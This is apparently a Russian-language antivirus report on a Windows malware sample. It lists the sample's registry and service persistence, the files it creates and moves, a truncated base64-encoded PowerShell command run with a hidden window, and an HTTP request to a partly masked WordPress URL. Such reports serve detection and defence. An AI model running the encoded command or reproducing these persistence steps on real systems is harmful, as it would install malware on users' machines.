Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKLM>\Software\Classes\Recalc.Document.1\shell\open\command] '' = '%HOMEPATH%\137.exe /dde'
- [<HKLM>\SOFTWARE\CLASSES\Recalc.Document.1\shell\open\command] '' = '<SYSTEM32>\kdsumx.exe /dde'
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\kdsumx] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\kdsumx] 'ImagePath' = '"<SYSTEM32>\kdsumx.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAANgA3ADAAMgAzAHgANgA1AHgANQA3AD0AJwBjADMANgA4ADAAYgBjADAAMABjADAAMwB4ACcAOwAkAGMAMAB4ADYAYwA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\137.exe
Перемещает следующие файлы
- %HOMEPATH%\137.exe в <SYSTEM32>\kdsumx.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ma###pai.com/wp-admin/lb8232/
UDP
- DNS ASK ma###pai.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\137.exe'
- '<SYSTEM32>\kdsumx.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAANgA3ADAAMgAzAHgANgA1AHgANQA3AD0AJwBjADMANgA4ADAAYgBjADAAMABjADAAMwB4ACcAOwAkAGMAMAB4ADYAYwA...' (со скрытым окном)
- '<SYSTEM32>\werfault.exe' -u -p 1036 -s 172' (со скрытым окном)
